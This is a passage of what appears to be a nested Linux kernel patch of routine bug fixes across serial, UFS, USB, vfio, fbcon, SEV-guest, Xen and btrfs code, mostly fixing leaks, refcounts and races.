+ 
+@@ -2350,6 +2377,36 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	ucr1 &= ~(UCR1_ADEN | UCR1_TRDYEN | UCR1_IDEN | UCR1_RRDYEN | UCR1_RTSDEN);
+ 	imx_uart_writel(sport, ucr1, UCR1);
+ 
++	/* Disable Ageing Timer interrupt */
++	ucr2 = imx_uart_readl(sport, UCR2);
++	ucr2 &= ~UCR2_ATEN;
++	imx_uart_writel(sport, ucr2, UCR2);
++
++	/*
++	 * In case RS485 is enabled without GPIO RTS control, the UART IP
++	 * is used to control CTS signal. Keep both the UART and Receiver
++	 * enabled, otherwise the UART IP pulls CTS signal always HIGH no
++	 * matter how the UCR2 CTSC and CTS bits are set. To prevent any
++	 * data from being fed into the RX FIFO, enable loopback mode in
++	 * UTS register, which disconnects the RX path from external RXD
++	 * pin and connects it to the Transceiver, which is disabled, so
++	 * no data can be fed to the RX FIFO that way.
++	 */
++	if (sport->port.rs485.flags & SER_RS485_ENABLED &&
++	    sport->have_rtscts && !sport->have_rtsgpio) {
++		uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
++		uts |= UTS_LOOP;
++		imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
++
++		ucr1 = imx_uart_readl(sport, UCR1);
++		ucr1 |= UCR1_UARTEN;
++		imx_uart_writel(sport, ucr1, UCR1);
++
++		ucr2 = imx_uart_readl(sport, UCR2);
++		ucr2 |= UCR2_RXEN;
++		imx_uart_writel(sport, ucr2, UCR2);
++	}
++
+ 	if (!imx_uart_is_imx1(sport) && sport->dte_mode) {
+ 		/*
+ 		 * The DCEDTE bit changes the direction of DSR, DCD, DTR and RI
+diff --git a/drivers/tty/serial/serial-tegra.c b/drivers/tty/serial/serial-tegra.c
+index cda9cd4fa92c8..c08360212aa20 100644
+--- a/drivers/tty/serial/serial-tegra.c
++++ b/drivers/tty/serial/serial-tegra.c
+@@ -1047,6 +1047,7 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	if (tup->cdata->fifo_mode_enable_status) {
+ 		ret = tegra_uart_wait_fifo_mode_enabled(tup);
+ 		if (ret < 0) {
++			clk_disable_unprepare(tup->uart_clk);
+ 			dev_err(tup->uport.dev,
+ 				"Failed to enable FIFO mode: %d\n", ret);
+ 			return ret;
+@@ -1068,6 +1069,7 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	 */
+ 	ret = tegra_set_baudrate(tup, TEGRA_UART_DEFAULT_BAUD);
+ 	if (ret < 0) {
++		clk_disable_unprepare(tup->uart_clk);
+ 		dev_err(tup->uport.dev, "Failed to set baud rate\n");
+ 		return ret;
+ 	}
+@@ -1227,10 +1229,13 @@ static int tegra_uart_startup(struct uart_port *u)
+ 				dev_name(u->dev), tup);
+ 	if (ret < 0) {
+ 		dev_err(u->dev, "Failed to register ISR for IRQ %d\n", u->irq);
+-		goto fail_hw_init;
++		goto fail_request_irq;
+ 	}
+ 	return 0;
+ 
++fail_request_irq:
++	/* tup->uart_clk is already enabled in tegra_uart_hw_init */
++	clk_disable_unprepare(tup->uart_clk);
+ fail_hw_init:
+ 	if (!tup->use_rx_pio)
+ 		tegra_uart_dma_channel_free(tup, true);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index fb5c9e2fc5348..edd34dac91b1d 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -3006,6 +3006,22 @@ retry:
+ 		} else {
+ 			dev_err(hba->dev, "%s: failed to clear tag %d\n",
+ 				__func__, lrbp->task_tag);
++
++			spin_lock_irqsave(&hba->outstanding_lock, flags);
++			pending = test_bit(lrbp->task_tag,
++					   &hba->outstanding_reqs);
++			if (pending)
++				hba->dev_cmd.complete = NULL;
++			spin_unlock_irqrestore(&hba->outstanding_lock, flags);
++
++			if (!pending) {
++				/*
++				 * The completion handler ran while we tried to
++				 * clear the command.
++				 */
++				time_left = 1;
++				goto retry;
++			}
+ 		}
+ 	}
+ 
+@@ -5068,8 +5084,8 @@ static int ufshcd_slave_configure(struct scsi_device *sdev)
+ 	ufshcd_hpb_configure(hba, sdev);
+ 
+ 	blk_queue_update_dma_pad(q, PRDT_DATA_BYTE_COUNT_PAD - 1);
+-	if (hba->quirks & UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE)
+-		blk_queue_update_dma_alignment(q, PAGE_SIZE - 1);
++	if (hba->quirks & UFSHCD_QUIRK_4KB_DMA_ALIGNMENT)
++		blk_queue_update_dma_alignment(q, 4096 - 1);
+ 	/*
+ 	 * Block runtime-pm until all consumers are added.
+ 	 * Refer ufshcd_setup_links().
+diff --git a/drivers/ufs/host/ufs-exynos.c b/drivers/ufs/host/ufs-exynos.c
+index c3628a8645a56..3cdac89a28b81 100644
+--- a/drivers/ufs/host/ufs-exynos.c
++++ b/drivers/ufs/host/ufs-exynos.c
+@@ -1673,7 +1673,7 @@ static const struct exynos_ufs_drv_data exynos_ufs_drvs = {
+ 				  UFSHCD_QUIRK_BROKEN_OCS_FATAL_ERROR |
+ 				  UFSHCI_QUIRK_SKIP_MANUAL_WB_FLUSH_CTRL |
+ 				  UFSHCD_QUIRK_SKIP_DEF_UNIPRO_TIMEOUT_SETTING |
+-				  UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE,
++				  UFSHCD_QUIRK_4KB_DMA_ALIGNMENT,
+ 	.opts			= EXYNOS_UFS_OPT_HAS_APB_CLK_CTRL |
+ 				  EXYNOS_UFS_OPT_BROKEN_AUTO_CLK_CTRL |
+ 				  EXYNOS_UFS_OPT_BROKEN_RX_SEL_IDX |
+diff --git a/drivers/usb/early/xhci-dbc.c b/drivers/usb/early/xhci-dbc.c
+index bfb7e2b852996..7ef0a4b397620 100644
+--- a/drivers/usb/early/xhci-dbc.c
++++ b/drivers/usb/early/xhci-dbc.c
+@@ -874,7 +874,8 @@ retry:
+ 
+ static void early_xdbc_write(struct console *con, const char *str, u32 n)
+ {
+-	static char buf[XDBC_MAX_PACKET];
++	/* static variables are zeroed, so buf is always NULL terminated */
++	static char buf[XDBC_MAX_PACKET + 1];
+ 	int chunk, ret;
+ 	int use_cr = 0;
+ 
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index 7bbc776185469..4dcf29577f8f1 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -429,6 +429,12 @@ static int config_usb_cfg_link(
+ 	 * from another gadget or a random directory.
+ 	 * Also a function instance can only be linked once.
+ 	 */
++
++	if (gi->composite.gadget_driver.udc_name) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	list_for_each_entry(iter, &gi->available_func, cfs_list) {
+ 		if (iter != fi)
+ 			continue;
+diff --git a/drivers/usb/gadget/udc/fotg210-udc.c b/drivers/usb/gadget/udc/fotg210-udc.c
+index 693c73e5f61e8..3350b7776086a 100644
+--- a/drivers/usb/gadget/udc/fotg210-udc.c
++++ b/drivers/usb/gadget/udc/fotg210-udc.c
+@@ -706,6 +706,20 @@ static int fotg210_is_epnstall(struct fotg210_ep *ep)
+ 	return value & INOUTEPMPSR_STL_EP ? 1 : 0;
+ }
+ 
++/* For EP0 requests triggered by this driver (currently GET_STATUS response) */
++static void fotg210_ep0_complete(struct usb_ep *_ep, struct usb_request *req)
++{
++	struct fotg210_ep *ep;
++	struct fotg210_udc *fotg210;
++
++	ep = container_of(_ep, struct fotg210_ep, ep);
++	fotg210 = ep->fotg210;
++
++	if (req->status || req->actual != req->length) {
++		dev_warn(&fotg210->gadget.dev, "EP0 request failed: %d\n", req->status);
++	}
++}
++
+ static void fotg210_get_status(struct fotg210_udc *fotg210,
+ 				struct usb_ctrlrequest *ctrl)
+ {
+@@ -1171,6 +1185,8 @@ static int fotg210_udc_probe(struct platform_device *pdev)
+ 	if (fotg210->ep0_req == NULL)
+ 		goto err_map;
+ 
++	fotg210->ep0_req->complete = fotg210_ep0_complete;
++
+ 	fotg210_init(fotg210);
+ 
+ 	fotg210_disable_unplug(fotg210);
+diff --git a/drivers/usb/gadget/udc/fusb300_udc.c b/drivers/usb/gadget/udc/fusb300_udc.c
+index 5954800d652ca..08ba9c8c1e677 100644
+--- a/drivers/usb/gadget/udc/fusb300_udc.c
++++ b/drivers/usb/gadget/udc/fusb300_udc.c
+@@ -1346,6 +1346,7 @@ static int fusb300_remove(struct platform_device *pdev)
+ 	usb_del_gadget_udc(&fusb300->gadget);
+ 	iounmap(fusb300->reg);
+ 	free_irq(platform_get_irq(pdev, 0), fusb300);
++	free_irq(platform_get_irq(pdev, 1), fusb300);
+ 
+ 	fusb300_free_request(&fusb300->ep[0]->ep, fusb300->ep0_req);
+ 	for (i = 0; i < FUSB300_MAX_NUM_EP; i++)
+@@ -1431,7 +1432,7 @@ static int fusb300_probe(struct platform_device *pdev)
+ 			IRQF_SHARED, udc_name, fusb300);
+ 	if (ret < 0) {
+ 		pr_err("request_irq1 error (%d)\n", ret);
+-		goto clean_up;
++		goto err_request_irq1;
+ 	}
+ 
+ 	INIT_LIST_HEAD(&fusb300->gadget.ep_list);
+@@ -1470,7 +1471,7 @@ static int fusb300_probe(struct platform_device *pdev)
+ 				GFP_KERNEL);
+ 	if (fusb300->ep0_req == NULL) {
+ 		ret = -ENOMEM;
+-		goto clean_up3;
++		goto err_alloc_request;
+ 	}
+ 
+ 	init_controller(fusb300);
+@@ -1485,7 +1486,10 @@ static int fusb300_probe(struct platform_device *pdev)
+ err_add_udc:
+ 	fusb300_free_request(&fusb300->ep[0]->ep, fusb300->ep0_req);
+ 
+-clean_up3:
++err_alloc_request:
++	free_irq(ires1->start, fusb300);
++
++err_request_irq1:
+ 	free_irq(ires->start, fusb300);
+ 
+ clean_up:
+diff --git a/drivers/usb/host/fsl-mph-dr-of.c b/drivers/usb/host/fsl-mph-dr-of.c
+index e5df175228928..46c6a152b8655 100644
+--- a/drivers/usb/host/fsl-mph-dr-of.c
++++ b/drivers/usb/host/fsl-mph-dr-of.c
+@@ -112,8 +112,7 @@ static struct platform_device *fsl_usb2_device_register(
+ 			goto error;
+ 	}
+ 
+-	pdev->dev.of_node = ofdev->dev.of_node;
+-	pdev->dev.of_node_reused = true;
++	device_set_of_node_from_dev(&pdev->dev, &ofdev->dev);
+ 
+ 	retval = platform_device_add(pdev);
+ 	if (retval)
+diff --git a/drivers/usb/host/max3421-hcd.c b/drivers/usb/host/max3421-hcd.c
+index 352e3ac2b377b..19111e83ac131 100644
+--- a/drivers/usb/host/max3421-hcd.c
++++ b/drivers/usb/host/max3421-hcd.c
+@@ -1436,7 +1436,7 @@ max3421_spi_thread(void *dev_id)
+ 			 * use spi_wr_buf().
+ 			 */
+ 			for (i = 0; i < ARRAY_SIZE(max3421_hcd->iopins); ++i) {
+-				u8 val = spi_rd8(hcd, MAX3421_REG_IOPINS1);
++				u8 val = spi_rd8(hcd, MAX3421_REG_IOPINS1 + i);
+ 
+ 				val = ((val & 0xf0) |
+ 				       (max3421_hcd->iopins[i] & 0x0f));
+diff --git a/drivers/usb/musb/mediatek.c b/drivers/usb/musb/mediatek.c
+index cad991380b0cf..27b9bd2583400 100644
+--- a/drivers/usb/musb/mediatek.c
++++ b/drivers/usb/musb/mediatek.c
+@@ -294,7 +294,8 @@ static int mtk_musb_init(struct musb *musb)
+ err_phy_power_on:
+ 	phy_exit(glue->phy);
+ err_phy_init:
+-	mtk_otg_switch_exit(glue);
++	if (musb->port_mode == MUSB_OTG)
++		mtk_otg_switch_exit(glue);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/typec/mux/intel_pmc_mux.c b/drivers/usb/typec/mux/intel_pmc_mux.c
+index fdbf3694e21f4..87e2c91306070 100644
+--- a/drivers/usb/typec/mux/intel_pmc_mux.c
++++ b/drivers/usb/typec/mux/intel_pmc_mux.c
+@@ -614,8 +614,10 @@ static int pmc_usb_probe_iom(struct pmc_usb *pmc)
+ 
+ 	INIT_LIST_HEAD(&resource_list);
+ 	ret = acpi_dev_get_memory_resources(adev, &resource_list);
+-	if (ret < 0)
++	if (ret < 0) {
++		acpi_dev_put(adev);
+ 		return ret;
++	}
+ 
+ 	rentry = list_first_entry_or_null(&resource_list, struct resource_entry, node);
+ 	if (rentry)
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 2209372f236db..7fa68dc4e938a 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -100,6 +100,8 @@ struct vfio_dma {
+ 	struct task_struct	*task;
+ 	struct rb_root		pfn_list;	/* Ex-user pinned pfn list */
+ 	unsigned long		*bitmap;
++	struct mm_struct	*mm;
++	size_t			locked_vm;
+ };
+ 
+ struct vfio_batch {
+@@ -412,6 +414,19 @@ static int vfio_iova_put_vfio_pfn(struct vfio_dma *dma, struct vfio_pfn *vpfn)
+ 	return ret;
+ }
+ 
++static int mm_lock_acct(struct task_struct *task, struct mm_struct *mm,
++			bool lock_cap, long npage)
++{
++	int ret = mmap_write_lock_killable(mm);
++
++	if (ret)
++		return ret;
++
++	ret = __account_locked_vm(mm, abs(npage), npage > 0, task, lock_cap);
++	mmap_write_unlock(mm);
++	return ret;
++}
++
+ static int vfio_lock_acct(struct vfio_dma *dma, long npage, bool async)
+ {
+ 	struct mm_struct *mm;
+@@ -420,16 +435,13 @@ static int vfio_lock_acct(struct vfio_dma *dma, long npage, bool async)
+ 	if (!npage)
+ 		return 0;
+ 
+-	mm = async ? get_task_mm(dma->task) : dma->task->mm;
+-	if (!mm)
++	mm = dma->mm;
++	if (async && !mmget_not_zero(mm))
+ 		return -ESRCH; /* process exited */
+ 
+-	ret = mmap_write_lock_killable(mm);
+-	if (!ret) {
+-		ret = __account_locked_vm(mm, abs(npage), npage > 0, dma->task,
+-					  dma->lock_cap);
+-		mmap_write_unlock(mm);
+-	}
++	ret = mm_lock_acct(dma->task, mm, dma->lock_cap, npage);
++	if (!ret)
++		dma->locked_vm += npage;
+ 
+ 	if (async)
+ 		mmput(mm);
+@@ -794,8 +806,8 @@ static int vfio_pin_page_external(struct vfio_dma *dma, unsigned long vaddr,
+ 	struct mm_struct *mm;
+ 	int ret;
+ 
+-	mm = get_task_mm(dma->task);
+-	if (!mm)
++	mm = dma->mm;
++	if (!mmget_not_zero(mm))
+ 		return -ENODEV;
+ 
+ 	ret = vaddr_get_pfns(mm, vaddr, 1, dma->prot, pfn_base, pages);
+@@ -805,7 +817,7 @@ static int vfio_pin_page_external(struct vfio_dma *dma, unsigned long vaddr,
+ 	ret = 0;
+ 
+ 	if (do_accounting && !is_invalid_reserved_pfn(*pfn_base)) {
+-		ret = vfio_lock_acct(dma, 1, true);
++		ret = vfio_lock_acct(dma, 1, false);
+ 		if (ret) {
+ 			put_pfn(*pfn_base, dma->prot);
+ 			if (ret == -ENOMEM)
+@@ -861,6 +873,12 @@ static int vfio_iommu_type1_pin_pages(void *iommu_data,
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	if (WARN_ONCE(iommu->vaddr_invalid_count,
++		      "vfio_pin_pages not allowed with VFIO_UPDATE_VADDR\n")) {
++		ret = -EBUSY;
++		goto pin_done;
++	}
++
+ 	/*
+ 	 * Wait for all necessary vaddr's to be valid so they can be used in
+ 	 * the main loop without dropping the lock, to avoid racing vs unmap.
+@@ -1174,6 +1192,7 @@ static void vfio_remove_dma(struct vfio_iommu *iommu, struct vfio_dma *dma)
+ 	vfio_unmap_unpin(iommu, dma, true);
+ 	vfio_unlink_dma(iommu, dma);
+ 	put_task_struct(dma->task);
++	mmdrop(dma->mm);
+ 	vfio_dma_bitmap_free(dma);
+ 	if (dma->vaddr_invalid) {
+ 		iommu->vaddr_invalid_count--;
+@@ -1343,6 +1362,12 @@ static int vfio_dma_do_unmap(struct vfio_iommu *iommu,
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	/* Cannot update vaddr if mdev is present. */
++	if (invalidate_vaddr && !list_empty(&iommu->emulated_iommu_groups)) {
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	pgshift = __ffs(iommu->pgsize_bitmap);
+ 	pgsize = (size_t)1 << pgshift;
+ 
+@@ -1566,6 +1591,38 @@ static bool vfio_iommu_iova_dma_valid(struct vfio_iommu *iommu,
+ 	return list_empty(iova);
+ }
+ 
++static int vfio_change_dma_owner(struct vfio_dma *dma)
++{
++	struct task_struct *task = current->group_leader;
++	struct mm_struct *mm = current->mm;
++	long npage = dma->locked_vm;
++	bool lock_cap;
++	int ret;
++
++	if (mm == dma->mm)
++		return 0;
++
++	lock_cap = capable(CAP_IPC_LOCK);
++	ret = mm_lock_acct(task, mm, lock_cap, npage);
++	if (ret)
++		return ret;
++
++	if (mmget_not_zero(dma->mm)) {
++		mm_lock_acct(dma->task, dma->mm, dma->lock_cap, -npage);
++		mmput(dma->mm);
++	}
++
++	if (dma->task != task) {
++		put_task_struct(dma->task);
++		dma->task = get_task_struct(task);
++	}
++	mmdrop(dma->mm);
++	dma->mm = mm;
++	mmgrab(dma->mm);
++	dma->lock_cap = lock_cap;
++	return 0;
++}
++
+ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 			   struct vfio_iommu_type1_dma_map *map)
+ {
+@@ -1615,6 +1672,9 @@ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 			   dma->size != size) {
+ 			ret = -EINVAL;
+ 		} else {
++			ret = vfio_change_dma_owner(dma);
++			if (ret)
++				goto out_unlock;
+ 			dma->vaddr = vaddr;
+ 			dma->vaddr_invalid = false;
+ 			iommu->vaddr_invalid_count--;
+@@ -1652,29 +1712,15 @@ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 	 * against the locked memory limit and we need to be able to do both
+ 	 * outside of this call path as pinning can be asynchronous via the
+ 	 * external interfaces for mdev devices.  RLIMIT_MEMLOCK requires a
+-	 * task_struct and VM locked pages requires an mm_struct, however
+-	 * holding an indefinite mm reference is not recommended, therefore we
+-	 * only hold a reference to a task.  We could hold a reference to
+-	 * current, however QEMU uses this call path through vCPU threads,
+-	 * which can be killed resulting in a NULL mm and failure in the unmap
+-	 * path when called via a different thread.  Avoid this problem by
+-	 * using the group_leader as threads within the same group require
+-	 * both CLONE_THREAD and CLONE_VM and will therefore use the same
+-	 * mm_struct.
+-	 *
+-	 * Previously we also used the task for testing CAP_IPC_LOCK at the
+-	 * time of pinning and accounting, however has_capability() makes use
+-	 * of real_cred, a copy-on-write field, so we can't guarantee that it
+-	 * matches group_leader, or in fact that it might not change by the
+-	 * time it's evaluated.  If a process were to call MAP_DMA with
+-	 * CAP_IPC_LOCK but later drop it, it doesn't make sense that they
+-	 * possibly see different results for an iommu_mapped vfio_dma vs
+-	 * externally mapped.  Therefore track CAP_IPC_LOCK in vfio_dma at the
+-	 * time of calling MAP_DMA.
++	 * task_struct. Save the group_leader so that all DMA tracking uses
++	 * the same task, to make debugging easier.  VM locked pages requires
++	 * an mm_struct, so grab the mm in case the task dies.
+ 	 */
+ 	get_task_struct(current->group_leader);
+ 	dma->task = current->group_leader;
+ 	dma->lock_cap = capable(CAP_IPC_LOCK);
++	dma->mm = current->mm;
++	mmgrab(dma->mm);
+ 
+ 	dma->pfn_list = RB_ROOT;
+ 
+@@ -2194,11 +2240,16 @@ static int vfio_iommu_type1_attach_group(void *iommu_data,
+ 	struct iommu_domain_geometry *geo;
+ 	LIST_HEAD(iova_copy);
+ 	LIST_HEAD(group_resv_regions);
+-	int ret = -EINVAL;
++	int ret = -EBUSY;
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	/* Attach could require pinning, so disallow while vaddr is invalid. */
++	if (iommu->vaddr_invalid_count)
++		goto out_unlock;
++
+ 	/* Check for duplicates */
++	ret = -EINVAL;
+ 	if (vfio_iommu_find_iommu_group(iommu, iommu_group))
+ 		goto out_unlock;
+ 
+@@ -2669,6 +2720,16 @@ static int vfio_domains_have_enforce_cache_coherency(struct vfio_iommu *iommu)
+ 	return ret;
+ }
+ 
++static bool vfio_iommu_has_emulated(struct vfio_iommu *iommu)
++{
++	bool ret;
++
++	mutex_lock(&iommu->lock);
++	ret = !list_empty(&iommu->emulated_iommu_groups);
++	mutex_unlock(&iommu->lock);
++	return ret;
++}
++
+ static int vfio_iommu_type1_check_extension(struct vfio_iommu *iommu,
+ 					    unsigned long arg)
+ {
+@@ -2677,8 +2738,13 @@ static int vfio_iommu_type1_check_extension(struct vfio_iommu *iommu,
+ 	case VFIO_TYPE1v2_IOMMU:
+ 	case VFIO_TYPE1_NESTING_IOMMU:
+ 	case VFIO_UNMAP_ALL:
+-	case VFIO_UPDATE_VADDR:
+ 		return 1;
++	case VFIO_UPDATE_VADDR:
++		/*
++		 * Disable this feature if mdevs are present.  They cannot
++		 * safely pin/unpin/rw while vaddrs are being updated.
++		 */
++		return iommu && !vfio_iommu_has_emulated(iommu);
+ 	case VFIO_DMA_CC_IOMMU:
+ 		if (!iommu)
+ 			return 0;
+@@ -3099,9 +3165,8 @@ static int vfio_iommu_type1_dma_rw_chunk(struct vfio_iommu *iommu,
+ 			!(dma->prot & IOMMU_READ))
+ 		return -EPERM;
+ 
+-	mm = get_task_mm(dma->task);
+-
+-	if (!mm)
++	mm = dma->mm;
++	if (!mmget_not_zero(mm))
+ 		return -EPERM;
+ 
+ 	if (kthread)
+@@ -3147,6 +3212,13 @@ static int vfio_iommu_type1_dma_rw(void *iommu_data, dma_addr_t user_iova,
+ 	size_t done;
+ 
+ 	mutex_lock(&iommu->lock);
++
++	if (WARN_ONCE(iommu->vaddr_invalid_count,
++		      "vfio_dma_rw not allowed with VFIO_UPDATE_VADDR\n")) {
++		ret = -EBUSY;
++		goto out;
++	}
++
+ 	while (count > 0) {
+ 		ret = vfio_iommu_type1_dma_rw_chunk(iommu, user_iova, data,
+ 						    count, write, &done);
+@@ -3158,6 +3230,7 @@ static int vfio_iommu_type1_dma_rw(void *iommu_data, dma_addr_t user_iova,
+ 		user_iova += done;
+ 	}
+ 
++out:
+ 	mutex_unlock(&iommu->lock);
+ 	return ret;
+ }
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 1b14c21af2b74..2bc8baa90c0f2 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -958,7 +958,7 @@ static const char *fbcon_startup(void)
+ 	set_blitting_type(vc, info);
+ 
+ 	/* Setup default font */
+-	if (!p->fontdata && !vc->vc_font.data) {
++	if (!p->fontdata) {
+ 		if (!fontname[0] || !(font = find_font(fontname)))
+ 			font = get_default_font(info->var.xres,
+ 						info->var.yres,
+@@ -968,8 +968,6 @@ static const char *fbcon_startup(void)
+ 		vc->vc_font.height = font->height;
+ 		vc->vc_font.data = (void *)(p->fontdata = font->data);
+ 		vc->vc_font.charcount = font->charcount;
+-	} else {
+-		p->fontdata = vc->vc_font.data;
+ 	}
+ 
+ 	cols = FBCON_SWAP(ops->rotate, info->var.xres, info->var.yres);
+@@ -1135,9 +1133,9 @@ static void fbcon_init(struct vc_data *vc, int init)
+ 	ops->p = &fb_display[fg_console];
+ }
+ 
+-static void fbcon_free_font(struct fbcon_display *p, bool freefont)
++static void fbcon_free_font(struct fbcon_display *p)
+ {
+-	if (freefont && p->userfont && p->fontdata && (--REFCOUNT(p->fontdata) == 0))
++	if (p->userfont && p->fontdata && (--REFCOUNT(p->fontdata) == 0))
+ 		kfree(p->fontdata - FONT_EXTRA_WORDS * sizeof(int));
+ 	p->fontdata = NULL;
+ 	p->userfont = 0;
+@@ -1172,8 +1170,8 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	struct fb_info *info;
+ 	struct fbcon_ops *ops;
+ 	int idx;
+-	bool free_font = true;
+ 
++	fbcon_free_font(p);
+ 	idx = con2fb_map[vc->vc_num];
+ 
+ 	if (idx == -1)
+@@ -1184,8 +1182,6 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	if (!info)
+ 		goto finished;
+ 
+-	if (info->flags & FBINFO_MISC_FIRMWARE)
+-		free_font = false;
+ 	ops = info->fbcon_par;
+ 
+ 	if (!ops)
+@@ -1197,9 +1193,8 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	ops->initialized = false;
+ finished:
+ 
+-	fbcon_free_font(p, free_font);
+-	if (free_font)
+-		vc->vc_font.data = NULL;
++	fbcon_free_font(p);
++	vc->vc_font.data = NULL;
+ 
+ 	if (vc->vc_hi_font_mask && vc->vc_screenbuf)
+ 		set_vc_hi_font(vc, false);
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 99d6062afe72f..6de888bce1bb1 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -379,9 +379,26 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		snp_dev->input.data_npages = certs_npages;
+ 	}
+ 
++	/*
++	 * Increment the message sequence number. There is no harm in doing
++	 * this now because decryption uses the value stored in the response
++	 * structure and any failure will wipe the VMPCK, preventing further
++	 * use anyway.
++	 */
++	snp_inc_msg_seqno(snp_dev);
++
+ 	if (fw_err)
+ 		*fw_err = err;
+ 
++	/*
++	 * If an extended guest request was issued and the supplied certificate
++	 * buffer was not large enough, a standard guest request was issued to
++	 * prevent IV reuse. If the standard request was successful, return -EIO
++	 * back to the caller as would have originally been returned.
++	 */
++	if (!rc && err == SNP_GUEST_REQ_INVALID_LEN)
++		return -EIO;
++
+ 	if (rc) {
+ 		dev_alert(snp_dev->dev,
+ 			  "Detected error from ASP request. rc: %d, fw_err: %llu\n",
+@@ -397,9 +414,6 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		goto disable_vmpck;
+ 	}
+ 
+-	/* Increment to new message sequence after payload decryption was successful. */
+-	snp_inc_msg_seqno(snp_dev);
+-
+ 	return 0;
+ 
+ disable_vmpck:
+diff --git a/drivers/xen/grant-dma-iommu.c b/drivers/xen/grant-dma-iommu.c
+index 16b8bc0c0b33d..6a9fe02c6bfcc 100644
+--- a/drivers/xen/grant-dma-iommu.c
++++ b/drivers/xen/grant-dma-iommu.c
+@@ -16,8 +16,15 @@ struct grant_dma_iommu_device {
+ 	struct iommu_device iommu;
+ };
+ 
+-/* Nothing is really needed here */
+-static const struct iommu_ops grant_dma_iommu_ops;
++static struct iommu_device *grant_dma_iommu_probe_device(struct device *dev)
++{
++	return ERR_PTR(-ENODEV);
++}
++
++/* Nothing is really needed here except a dummy probe_device callback */
++static const struct iommu_ops grant_dma_iommu_ops = {
++	.probe_device = grant_dma_iommu_probe_device,
++};
+ 
+ static const struct of_device_id grant_dma_iommu_of_match[] = {
+ 	{ .compatible = "xen,grant-dma" },
+diff --git a/fs/btrfs/discard.c b/fs/btrfs/discard.c
+index e1b7bd927d691..bd9dde374e5d8 100644
+--- a/fs/btrfs/discard.c
++++ b/fs/btrfs/discard.c
+@@ -77,6 +77,7 @@ static struct list_head *get_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ static void __add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 				  struct btrfs_block_group *block_group)
+ {
++	lockdep_assert_held(&discard_ctl->lock);
+ 	if (!btrfs_run_discard_work(discard_ctl))
+ 		return;
+ 
+@@ -88,6 +89,8 @@ static void __add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 						      BTRFS_DISCARD_DELAY);
+ 		block_group->discard_state = BTRFS_DISCARD_RESET_CURSOR;
+ 	}
++	if (list_empty(&block_group->discard_list))
++		btrfs_get_block_group(block_group);
+ 
+ 	list_move_tail(&block_group->discard_list,
+ 		       get_discard_list(discard_ctl, block_group));
+@@ -107,8 +110,12 @@ static void add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ static void add_to_discard_unused_list(struct btrfs_discard_ctl *discard_ctl,
+ 				       struct btrfs_block_group *block_group)
+ {
++	bool queued;
++
+ 	spin_lock(&discard_ctl->lock);
+ 
++	queued = !list_empty(&block_group->discard_list);
++
+ 	if (!btrfs_run_discard_work(discard_ctl)) {
+ 		spin_unlock(&discard_ctl->lock);
+ 		return;
+@@ -120,6 +127,8 @@ static void add_to_discard_unused_list(struct btrfs_discard_ctl *discard_ctl,
+ 	block_group->discard_eligible_time = (ktime_get_ns() +
+ 					      BTRFS_DISCARD_UNUSED_DELAY);
+ 	block_group->discard_state = BTRFS_DISCARD_RESET_CURSOR;
++	if (!queued)
++		btrfs_get_block_group(block_group);
+ 	list_add_tail(&block_group->discard_list,
+ 		      &discard_ctl->discard_list[BTRFS_DISCARD_INDEX_UNUSED]);
+ 
+@@ -130,6 +139,7 @@ static bool remove_from_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 				     struct btrfs_block_group *block_group)
+ {
+ 	bool running = false;
++	bool queued = false;
+ 
+ 	spin_lock(&discard_ctl->lock);
+ 
+@@ -139,7 +149,16 @@ static bool remove_from_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 	}
+ 
+ 	block_group->discard_eligible_time = 0;
++	queued = !list_empty(&block_group->discard_list);
+ 	list_del_init(&block_group->discard_list);
++	/*
++	 * If the block group is currently running in the discard workfn, we
++	 * don't want to deref it, since it's still being used by the workfn.
++	 * The workfn will notice this case and deref the block group when it is
++	 * finished.
++	 */
++	if (queued && !running)
++		btrfs_put_block_group(block_group);
+ 
+ 	spin_unlock(&discard_ctl->lock);
+ 
+@@ -212,10 +231,12 @@ again:
+ 	if (block_group && now >= block_group->discard_eligible_time) {
